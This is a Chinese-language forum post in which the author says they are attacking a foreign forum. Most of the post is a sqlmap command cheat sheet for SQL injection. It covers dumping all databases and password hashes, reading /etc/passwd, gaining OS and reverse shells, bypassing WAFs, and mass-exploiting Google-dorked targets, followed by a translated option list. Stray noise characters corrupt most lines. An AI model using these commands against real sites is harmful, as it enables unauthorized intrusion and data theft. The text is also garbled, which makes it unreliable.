今天搞国外的一个论坛。发现萝卜和穿山甲都无法正常注入,实在没办法了 还是临时学习了下国外的神器sqlmap的使用方法,,直接做个记录、、& G, H, E, J$ l" W, n. T
sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1″ –current-db #获取当前数 据库名称( y- A5 C+ |& T8 q- O# O- k
sqlmap -u “http://www.xxoo.com/news?id=1″ –tables -D “db_name”#列 表名1 I B/ s4 M' R$ r# _8 R
sqlmap -u “http://url/news?id=1″ –columns -T “tablename”users-D “db_name”-v 0 #列字段
# ^; I% i) @, W& x0 O 8 x$ b+ A- x1 g. ~( S- a* E4 b
sqlmap -u “http://url/news?id=1″ –dump -C “column_name” -T “table_name”-D “db_name”-v5 h- o3 p0 v( i2 V9 b( d7 s
0 #获取字段内容. n2 B" o9 n" U z
& Q/ Z' J0 `" r4 @/ @; g******************信息获取******************' M# ?9 s( G; o6 X% |: w+ P( \
sqlmap -u “http://url/news?id=1″ –dbms “Mysql” –users # dbms 指定数 据库类型/ n2 k+ v# Y' J2 r8 A
sqlmap -u “http://url/news?id=1″ –users #列数据库用户7 q% _; W- D1 X! M% k: e
sqlmap -u “http://url/news?id=1″ –dbs#列数据库
! V5 s; e* b j1 H' h0 tsqlmap -u “http://url/news?id=1″ –passwords #数据库用户密码3 s) e4 z# `$ R7 W5 p1 Z
sqlmap -u “http://url/news?id=1″ –passwords-U root -v 0 #列出指定用户 数据库密码5 H% t2 j k4 B& }9 `, z. |/ t
sqlmap -u “http://url/news?id=1″ –dump -C “password,user,id” -T “tablename”-D “db_name”
7 u' C" B+ d3 t+ R* K, F/ }–start 1 –stop 20 #列出指定字段,列出20 条+ E. W7 z9 M2 {+ ]3 j2 F7 Z \* G# X
sqlmap -u “http://url/news?id=1″ –dump-all -v 0 #列出所有数据库所有表8 @- Q/ D- l# s/ ?' ]" e; F: s) |# M
sqlmap -u “http://url/news?id=1″ –privileges #查看权限
$ f# _# P6 i3 Q. x6 h6 X! ~sqlmap -u “http://url/news?id=1″ –privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色5 b4 y3 j& E; }7 b6 c i! W" I
sqlmap -u “http://url/news?id=1″ –udf-inject #导入用户自定义函数(获取 系统权限!)2 u) k4 f7 i% R% h, U* m$ M/ a
sqlmap -u “http://url/news?id=1″ –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表
% A! V1 f* K6 |+ x9 _sqlmap -u “http://url/news?id=1″ –union-cols #union 查询表记录, d3 L5 N) }. x
sqlmap -u “http://url/news?id=1″ –cookie “COOKIE_VALUE”#cookie注入
; j+ Y* G- F6 W. D. V- G. Ssqlmap -u “http://url/news?id=1″-b #获取banner信息
9 C& o) ~4 o J7 Bsqlmap -u “http://url/news?id=1″ –data “id=3″#post注入* |$ j% M2 n3 P8 ~$ g
sqlmap -u “http://url/news?id=1″-v 1 -f #指纹判别数据库类型
" y3 ~' V& ]' S, H1 tsqlmap -u “http://url/news?id=1″ –proxy“http://127.0.0.1:8118” #代理注 入
; A+ \! x3 j' N% \sqlmap -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE”# 指 定关键词8 g& D4 o+ y: B; o8 T$ ` P; H0 _& E
sqlmap -u “http://url/news?id=1″ –sql-shell #执行指定sql命令' N, E1 M- D$ s( s0 v$ X
sqlmap -u “http://url/news?id=1″ –file /etc/passwd
( A$ s9 {! |1 u% Q1 k, k) s9 xsqlmap -u “http://url/news?id=1″ –os-cmd=whoami #执行系统命令5 k$ `) y9 i- O* Z8 | s" Z
sqlmap -u “http://url/news?id=1″ –os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell
' j2 v4 f, e/ Q: z9 rsqlmap -u “http://url/news?id=1″ –reg-read #读取win系统注册表
0 n0 B3 i! j0 D5 Nsqlmap -u “http://url/news?id=1″ –dbs-o “sqlmap.log”#保存进度8 |) t0 ~ S" Q/ Q# x4 [; R. \
sqlmap -u “http://url/news?id=1″ –dbs -o “sqlmap.log” –resume #恢复 已保存进度' M2 W( `. s5 H& h' [! V
***********高级用法*************3 j1 M5 B' o* d
-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入
% k+ p+ {2 I) K M9 R+ ^sqlmap -g “google语法” –dump-all –batch #google搜索注入点自动 跑出 所有字段 需保证google.com能正常访问
% ` }& n8 E8 c. E–technique 测试指定注入类型\使用的技术5 L2 ~- @9 ]! t1 f$ ^9 O5 S
不加参数默认测试所有注入技术
" w$ }/ X- D) B- q• B: 基于布尔的SQL 盲注+ m- e: s) l5 l) W+ ?
• E: 基于显错sql 注入
3 t+ f) j w s; P; T5 p• U: 基于UNION 注入9 W, w! p, s) q4 D$ A. G! z- n$ J7 T
• S: 叠层sql 注入- E6 `; n: Y0 T% z5 U
• T: 基于时间盲注
5 d$ n1 o# L; K: I–tamper 通过编码绕过WEB 防火墙(WAF)Sqlmap 默认用char()
/ b) b- }! O1 }: H–tamper 插件所在目录) |2 i4 L5 h& x x; j
\sqlmap-dev\tamper! K6 T5 @, O' o- n7 N+ s3 ]
sqlmap -u “http:// www.2cto.com /news?id=1″ –smart –level 3 –users # smart 智 能
1 }* z5 U. x3 w. v, T" Clevel 执行测试等级 攻击实例:% o6 o/ i: K$ [5 [
Sqlmap -u “http://url/news?id=1&Submit=Submit”
5 Q2 l9 f; w2 t# P2 v8 V–cookie=”PHPSESSID=41aa833e6d0d
4 I% z1 w; Y& m# B2 \$ [28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –user f5 v$ ?. p9 g2 U5 H8 b4 q
–password
: A6 |* X( J8 u( Y4 v. H参考文档:http://sqlmap.sourceforge.net/doc/README.html
- J- {0 m) \# q6 g. b, E/ ^5 g***********安装最新版本*************, k& v5 ?+ b% ]3 @* T% E4 [& `
ubuntu 通过apt-get install 安装的sqlmap版本为0.6 我们通过svn 来安装 为 最新1.0版
7 x1 u! d9 m, C9 d/ ?; A+ Bsudo svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev) v# j# @& i* U, s9 p
安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py 直接执行/home/当前用户/sqlmap-dev/sqlmap.py –version 这样很不方便 我们可以设置.bashrc 文件, Y+ \, i& Z% O
sudo vim /home/当前用户/.bashrc
5 t! Z I# Y1 O#任意位置加上:
$ @' w: j1 b o; b$ `; K1 w% w! Zalias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 该环境变量只对当前用户有效& L! ~/ [) y( \, V2 _% D
如果想对所有用户有效 可设置全局 编辑下面的文件
/ g4 B0 w" N- S& Y; Tvim /etc/profile
% {$ {! Q# D3 \1 B; A0 ^ L8 s同样加上:
1 @* a, y0 Z) H, o( e/ ialias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 重启生效
+ K7 ^) y9 m3 P+ k) b******************windows 7 (x64) sqlmap install (SVN)************3 S7 ~3 V6 T% E6 \7 L
http://www.python.org/getit/ 安装python+ B7 F2 i7 j0 c
http://www.sliksvn.com/en/download 安装windows svn client
) A% G* g9 R4 T9 b0 f/ Csvn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev3 r1 ]- ]8 |4 {' u! W$ U
安装sqlmap
& P) q5 H4 V" K" |+ J; w% e*修改环境变量
" J" B3 T. x- ], [7 q; T" a–version 显示程序的版本号并退出8 |; J" E7 P/ e+ q, }2 n
-h, –help 显示此帮助消息并退出+ O6 l: Z. x. R" p& l9 q# t; F
-v VERBOSE 详细级别:0-6(默认为1)
, m$ v2 ]0 i1 Y& KTarget(目标): 以下至少需要设置其中一个选项,设置目标URL。
1 H% W" `) O4 }4 N) B-d DIRECT 直接连接到数据库。
- h b- F8 M2 K1 a-u URL, –url=URL 目标URL。
3 I" Q8 }) m( M, o$ }" i8 x-l LIST 从Burp 或WebScarab 代理的日志中解析目标。( c5 T4 S, o/ _# i2 Q1 p& Y/ R; `
-r REQUESTFILE 从一个文件中载入HTTP 请求。: t1 @5 I2 s, F( a! d9 \5 Q
-g GOOGLEDORK 处理Google dork 的结果作为目标URL。, G9 B' d. |) V
-c CONFIGFILE 从INI 配置文件中加载选项。4 N& {2 c9 \* e( E
Request(请求)::
. q v, y' _2 a# l3 B这些选项可以用来指定如何连接到目标URL。4 F8 G! u" ?1 E# [- ], S' _
–data=DATA 通过POST 发送的数据字符串5 Y* z4 ?( E1 d8 s
–cookie=COOKIE HTTP Cookie 头
% Y0 r3 O( ~) L: X# E–cookie-urlencode URL 编码生成的cookie 注入 V: M7 o) R" P6 h1 y
–drop-set-cookie 忽略响应的Set –Cookie 头信息 H' ]( ?* m2 T, J
6 U- K. a" k4 @1 M3 e. |) J( L–user-agent=AGENT 指定 HTTP User –Agent 头% R \+ r. n8 Z
–random-agent 使用随机选定的HTTP User –Agent 头! r4 G- o8 d( r5 t3 O
–referer=REFERER 指定 HTTP Referer 头
8 X3 ~8 L: D5 T7 Y6 |7 ?–headers=HEADERS 换行分开,加入其他的HTTP 头& @6 b, A2 @0 J1 [; M$ p
–auth-type=ATYPE HTTP 身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)
/ o& R9 `0 R7 _/ d' J–auth-cred=ACRED HTTP 身份验证凭据(用户名:密码)
7 q" z1 \0 D: ^1 b3 x G+ i, G' ?–auth-cert=ACERT HTTP 认证证书(key_file,cert_file)
g/ Y v( i% I; J( b% f–proxy=PROXY 使用HTTP 代理连接到目标URL, v6 S; ?$ t7 ~- V7 l9 a+ D" X
–proxy-cred=PCRED HTTP 代理身份验证凭据(用户名:密码), w' p0 S6 k7 a/ ~. n4 {
–ignore-proxy 忽略系统默认的HTTP 代理5 O) V G @) j
–delay=DELAY 在每个HTTP 请求之间的延迟时间,单位为秒
! F9 Z6 _7 g4 j. `6 S" t: }–timeout=TIMEOUT 等待连接超时的时间(默认为30 秒)
3 L& O$ l7 e* e6 g–retries=RETRIES 连接超时后重新连接的时间(默认3)
. B. Z% |+ { e1 t: w0 h* d: o5 G–scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式: `/ {3 r4 a8 W ?$ X
–safe-url=SAFURL 在测试过程中经常访问的url 地址, j* \; c' F' @, U, ~4 t w: V- D' _
–safe-freq=SAFREQ 两次访问之间测试请求,给出安全的URL* H7 ^' h8 W5 d
Optimization(优化): 这些选项可用于优化SqlMap 的性能。* b; \! B; O- s% }6 I
-o 开启所有优化开关
4 I, L& f: O( q( Q–predict-output 预测常见的查询输出
6 @3 B# @& x' ^# Y% A7 y7 u z–keep-alive 使用持久的HTTP(S)连接( x6 y7 N( J- b- R
–null-connection 从没有实际的HTTP 响应体中检索页面长度: y& m" u" `; Q' D0 b5 e
–threads=THREADS 最大的HTTP(S)请求并发量(默认为1)+ R! H. }, Q2 K. G2 }) j/ t
Injection(注入):
( ^0 @: N2 r5 J$ }这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads 和可选篡改脚本。
: K, F# z$ k3 v- V' S- y: g8 @! p-p TESTPARAMETER 可测试的参数(S)' `1 Z" K1 K1 v/ R p; [
–dbms=DBMS 强制后端的DBMS 为此值
9 t6 M: x1 ]; t–os=OS 强制后端的DBMS 操作系统为这个值1 _8 _* R! w1 X( l, o. v
–prefix=PREFIX 注入payload 字符串前缀
# ~! t( q/ Z' U7 h& @8 x% N& _–suffix=SUFFIX 注入 payload 字符串后缀
! f7 I' f1 |2 s, j ^3 o2 K% \–tamper=TAMPER 使用给定的脚本(S)篡改注入数据# V# r# }: n$ T
Detection(检测):" l, v' u# U" x( D2 `9 T
这些选项可以用来指定在SQL 盲注时如何解析和比较HTTP 响应页面的内容。" q. }* j" E O$ z9 v9 f4 i
–level=LEVEL 执行测试的等级(1-5,默认为1)
Z5 F8 F* F: c5 Y; Q) W' `–risk=RISK 执行测试的风险(0-3,默认为1)
, O P: [2 m! b5 `2 Y1 N–string=STRING 查询时有效时在页面匹配字符串+ a u9 B2 ^% h8 q) Y
–regexp=REGEXP 查询时有效时在页面匹配正则表达式# D' v1 U, q; w. k- \
–text-only 仅基于在文本内容比较网页+ u9 Z! g* b3 k& c4 C9 r
Techniques(技巧): 这些选项可用于调整具体的SQL 注入测试。3 `2 c) Z9 d6 E0 G/ l
–technique=TECH SQL 注入技术测试(默认BEUST)3 i3 c( b( K! Q
–time-sec=TIMESEC DBMS 响应的延迟时间(默认为5 秒)
: a# l& p- W' m–union-cols=UCOLS 定列范围用于测试UNION 查询注入; F1 v1 `0 b* |) h2 |; e% ]) i
–union-char=UCHAR 用于暴力猜解列数的字符
3 C$ j9 @3 ?6 v: p0 Z+ D! zFingerprint(指纹):
: w0 M: W( C1 \ X# S, ^-f, –fingerprint 执行检查广泛的DBMS 版本指纹
1 l* ]% r9 O3 m7 b( r mEnumeration(枚举):% a: W& H3 W% W3 y( d2 D
+ N, ^3 @) k- V
这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己 的SQL 语句。
& |" w0 v. O" k. I, }-b, –banner 检索数据库管理系统的标识. r% ` h# C8 p. c/ p
–current-user 检索数据库管理系统当前用户$ m9 P# X# r5 y7 b8 V+ l3 ~$ w
–current-db 检索数据库管理系统当前数据库
8 T ^( ]" M$ M' {9 A–is-dba 检测DBMS 当前用户是否DBA8 h+ ]: j" g& j3 k. J
–users 枚举数据库管理系统用户# h2 \; h( A5 E, v) c5 e
–passwords 枚举数据库管理系统用户密码哈希
# w! P( @! r& |( T2 v! G–privileges 枚举数据库管理系统用户的权限
6 K8 K& ?: r/ T( K( ~–roles 枚举数据库管理系统用户的角色
. m ^' E+ d" \! W V7 Z8 m–dbs 枚举数据库管理系统数据库: {4 y3 H: x8 f
–tables 枚举的DBMS 数据库中的表; H+ U! T% o* [) z) f' A4 p
–columns 枚举DBMS 数据库表列" p, o( y1 F: ~4 @# O6 `, {: h
–dump 转储数据库管理系统的数据库中的表项0 ?2 ^3 d4 V# n* z2 Q' s+ |* i; `1 L
–dump-all 转储所有的DBMS 数据库表中的条目
: |7 a! N) ]7 c& ~6 q$ ]–search 搜索列(S),表(S)和/或数据库名称(S)
' W- h4 v% Z9 b9 `) [-D DB 要进行枚举的数据库名
+ B# Q+ u5 c+ y6 h" p( j3 t-T TBL 要进行枚举的数据库表: ?2 P* k2 P& M/ m
-C COL 要进行枚举的数据库列
& t5 K2 m/ e' b. [" d-U USER 用来进行枚举的数据库用户
& L9 [5 g4 F# N0 K- U( E! k–exclude-sysdbs 枚举表时排除系统数据库
6 L0 @* ~' n' N–start=LIMITSTART 第一个查询输出进入检索
* T: d' a6 Q$ p2 D0 Q–stop=LIMITSTOP 最后查询的输出进入检索
& x: M3 f' F* q `, W* e! c) w–first=FIRSTCHAR 第一个查询输出字的字符检索
( r% X; r, s- T7 h–last=LASTCHAR 最后查询的输出字字符检索' R/ y$ q. P4 V, b& L/ C
–sql-query=QUERY 要执行的SQL 语句
+ S" B4 x, k$ m; w+ z–sql-shell 提示交互式SQL 的shell, ]/ c' R$ t& L, q# J7 i0 J
Brute force(蛮力): 这些选项可以被用来运行蛮力检查。
: P6 Y# k+ w7 Q; w–common-tables 检查存在共同表
5 `1 U( x- n8 d. v, N–common-columns 检查存在共同列
- \& ^% Z" }, M, U- hUser-defined function injection(用户自定义函数注入): 这些选项可以用来创建用户自定义函数。
% o: \; c w( l6 s3 O/ D# n6 z–udf-inject 注入用户自定义函数
# q: h* d5 |. l; ?–shared-lib=SHLIB 共享库的本地路径) [2 [7 M l8 u0 z$ F
File system access(访问文件系统): 这些选项可以被用来访问后端数据库管理系统的底层文件系统。9 a) s/ m7 v/ k$ M
–file-read=RFILE 从后端的数据库管理系统文件系统读取文件
4 R$ j. \& }3 |) }7 F9 T–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
! @. { l% U7 v' Q5 q* b) u, i–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径, E, M5 T" b8 ` y3 P& r8 u/ B4 S
Operating system access(操作系统访问): 这些选项可以用于访问后端数据库管理系统的底层操作系统。
4 |7 _8 J2 D# N( M+ b! [–os-cmd=OSCMD 执行操作系统命令5 P/ l% j% B, c1 }
–os-shell 交互式的操作系统的shell
( B2 s, S/ p- R–os-pwn 获取一个OOB shell,meterpreter 或VNC
( s3 E$ f7 U$ k–os-smbrelay 一键获取一个OOB shell,meterpreter 或VNC) u0 `: l9 O8 Y- N9 ^% ?% w2 t
–os-bof 存储过程缓冲区溢出利用$ K, m# {7 U3 I
–priv-esc 数据库进程用户权限提升2 n$ V) P m7 B5 @, {
–msf-path=MSFPATH Metasploit Framework 本地的安装路径9 T3 \' W; {8 \! P2 V* r( L2 l
–tmp-path=TMPPATH 远程临时文件目录的绝对路径% Y$ _& E( z, y) a J7 J. _
$ p) a1 m/ _6 Y. {9 A% f' U& s
Windows 注册表访问: 这些选项可以被用来访问后端数据库管理系统Windows 注册表。# R( X& U/ _$ U$ n1 s5 p
–reg-read 读一个Windows 注册表项值
7 J3 G& r0 \* y( o7 `! T# W: H' c% O–reg-add 写一个Windows 注册表项值数据
- @; B5 X) J) w8 n% @) [–reg-del 删除Windows 注册表键值
5 L) E z+ V; Q3 k$ I" |( c–reg-key=REGKEY Windows 注册表键/ m) t* I( N+ b) } d; |! b) N
–reg-value=REGVAL Windows 注册表项值& A M1 g7 q! I! a1 q6 j: |; ^
–reg-data=REGDATA Windows 注册表键值数据$ h1 n' O% j9 a1 c4 E2 t
–reg-type=REGTYPE Windows 注册表项值类型
* @5 m9 F$ N4 \/ T8 A2 T. LGeneral(一般): 这些选项可以用来设置一些一般的工作参数。1 x. @: _* ?. X% Q; E$ z
-t TRAFFICFILE 记录所有HTTP 流量到一个文本文件中0 I; p8 ^0 N# T4 t3 {
-s SESSIONFILE 保存和恢复检索会话文件的所有数据8 F5 B) c! U4 \+ p, {' N2 G
–flush-session 刷新当前目标的会话文件
p( P- \. V5 F–fresh-queries 忽略在会话文件中存储的查询结果
" _' c1 A; z+ ~8 t& \–eta 显示每个输出的预计到达时间% Z* N; j3 |4 l7 r0 x6 D4 ]
–update 更新SqlMap
' Y7 a$ \1 {" a–save file 保存选项到INI 配置文件
4 C4 J/ S9 T$ q# P6 l, v0 q. D–batch 从不询问用户输入,使用所有默认配置。
, Q- w$ Y% M# `7 T% bMiscellaneous(杂项):
/ l9 k9 v- p! \( J( g' M–beep 发现SQL 注入时提醒
+ ?; w7 J' C9 g–check-payload IDS 对注入payloads 的检测测试8 ]* t/ u e0 a! R: d
–cleanup SqlMap 具体的UDF 和表清理DBMS: v M' p2 U# ?: A5 `4 R6 D% C; Z
–forms 对目标URL 的解析和测试形式4 O. V* k$ D$ ~
–gpage=GOOGLEPAGE 从指定的页码使用谷歌dork 结果
1 ~7 c) U1 a! G! T3 L- x/ |# V( V3 b–page-rank Google dork 结果显示网页排名(PR)8 Q7 _; l) B, {: {) i! f0 R6 Y- m
–parse-errors 从响应页面解析数据库管理系统的错误消息
1 k1 V5 P! C2 D4 `–replicate 复制转储的数据到一个sqlite3 数据库: ^& x2 R" p1 o e3 R2 P4 y! D9 p
–tor 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址
0 ?' X+ e( Q) p" r1 m9 B–wizard 给初级用户的简单向导界面 |